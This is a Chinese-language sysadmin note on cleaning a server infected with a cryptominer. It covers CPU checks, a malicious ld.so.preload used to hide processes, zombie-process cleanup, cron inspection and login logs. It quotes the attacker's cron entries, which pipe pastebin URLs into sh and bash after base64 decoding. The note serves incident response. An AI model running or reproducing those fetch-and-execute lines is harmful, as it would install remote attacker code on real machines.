查看哪個進程占據cup

　 通過 top 或者使用 ps aux

我這個通過top 命令看不到哪個進程占用了cup ,執行 cat /etc/ld.so.preload 查看，裏面也加載了異常的文件，判斷是用於隱藏進程用的， 建議將其內容註釋掉或刪除，執行ldconfig 然後再使用top 查看下進程。

查找進程文件刪除 　

　ps -ef|grep shutdown [命令] 或者 /proc/4170 [pid]

找出系統中所有的僵屍進程

　　ps aux | grep ‘defunct‘　　

　　或
　　ps -ef | grep defunct | grep -v grep | wc -l

清理僵屍進程　

　ps -e -o ppid,stat | grep Z | cut -d" " -f2 | xargs kill -9
　　或
　　kill -HUP `ps -A -ostat,ppid | grep -e ‘^[Zz]‘ | awk ‘{print $2}‘`

查找系統中的定時任務

　　crontab -l

　　或者

　　cd /var/spool/cron #查看這個文件夾下的文件刪除
　　vim /etc/crontab

　　裏面會有一個定時任務我的分別是一下這幾個（刪除）, 瀏覽器打開網址是個腳本，通過base64 加密，解密即可看到腳本內容

* */10 * * *    /usr/bin/curl -fsSL https://
 
pastebin.com/raw/xbY7p5Tb|sh
 */1 * * * root /bin/sh /bin/httpdns
/usr/bin/curl -fsSL --connect-timeout 120 https://pastebin.com/raw/kDSLjxfQ|/usr/bin/base64 -d|/bin/bash

　　根據腳本刪除腳本創建的文件，我這裏刪除的是

　　/usr/local/lib/libjdk.so ，/etc/ld.so.preload

查看系統登錄日誌

日誌文件 /var/log/wtmp ，系統的每一次登錄，都會在此日誌中添加記錄，為了防止有人篡改，該文件為二進制文件

　 cd /var/log ; last

服務器被挖礦